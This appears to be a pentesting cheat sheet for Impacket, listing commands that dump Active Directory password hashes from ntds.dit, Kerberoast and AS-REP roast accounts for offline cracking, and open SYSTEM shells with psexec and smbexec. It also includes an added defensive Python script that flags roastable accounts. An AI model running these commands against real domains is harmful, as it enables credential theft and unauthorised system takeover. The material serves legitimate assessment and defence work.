Impacket
Impacket is a collection of Python classes for working with network protocols.
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
This script will gather data about the domain’s users and their corresponding email addresses.
GetADUsers.py -all -dc-ip <ip> <domain>/<user>:<pw>
This example will try to find and fetch Service Principal Names that are associated with normal user accounts.
GetUserSPNs.py -request -dc-ip <ip> <domain>/<user>:<pw>
-> Crack the hash, e.g. using hashcat, to obtain passwords
An application that communicates with the Security Account Manager Remote interface from the MSRPC suite.
samrdump.py <domain>
This example will attempt to list and get TGTs for those users that have the property ‘Do not require Kerberos preauthentication’ set (UF_DONT_REQUIRE_PREAUTH). Output is compatible with JtR.
GetNPUsers.py <domain>/<user> -no-pass
-> Crack the hash, e.g. using hashcat
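Seen from the defending side, the accounts that GetUserSPNs.py and GetNPUsers.py can target are identifiable from directory attributes alone. The following is an added example (not part of the original page and not Impacket code) that audits a CSV export of users for both conditions; the CSV layout, the column names and the sample rows are assumptions constructed for the example.

```python
import csv
import io

# userAccountControl bit flags (documented Microsoft values)
UF_ACCOUNTDISABLE = 0x0002
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000
UF_SERVER_TRUST_ACCOUNT = 0x2000
UF_DONT_REQUIRE_PREAUTH = 0x400000
# Machine accounts normally carry SPNs, so they are not findings here
MACHINE = UF_WORKSTATION_TRUST_ACCOUNT | UF_SERVER_TRUST_ACCOUNT

# Constructed sample export (assumed columns; all names are made up)
SAMPLE_EXPORT = """sAMAccountName,userAccountControl,servicePrincipalName
alice,512,
svc_sql,66048,MSSQLSvc/db01.example.test:1433
legacy_app,4194816,
old_svc,4260352,HTTP/intranet.example.test
disabled_svc,514,HTTP/old.example.test
WS01$,4096,HOST/ws01.example.test
"""


def audit(export_text):
    """Return {account: [findings]} for enabled, non-machine accounts."""
    findings = {}
    for row in csv.DictReader(io.StringIO(export_text)):
        uac = int(row["userAccountControl"])
        # Assumption of this example: disabled accounts are out of scope
        if uac & UF_ACCOUNTDISABLE or uac & MACHINE:
            continue
        issues = []
        if uac & UF_DONT_REQUIRE_PREAUTH:
            # 'Do not require Kerberos preauthentication' is set
            issues.append("preauth-not-required")
        if row["servicePrincipalName"].strip():
            # SPN registered on a normal user account
            issues.append("user-account-with-spn")
        if issues:
            findings[row["sAMAccountName"]] = issues
    return findings


if __name__ == "__main__":
    for name, issues in audit(SAMPLE_EXPORT).items():
        print(f"{name}: {', '.join(issues)}")
```

Accounts flagged as preauth-not-required should have the flag cleared unless an application depends on it, and flagged service accounts should carry long random passwords or be moved to managed service accounts.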
PSEXEC like functionality example using RemComSvc. -> Get a shell as "nt authority\system"
sudo psexec.py [<domain>/]<user>:[<pw>]@<ip>
sudo smbexec.py <user>:<pw>@<target>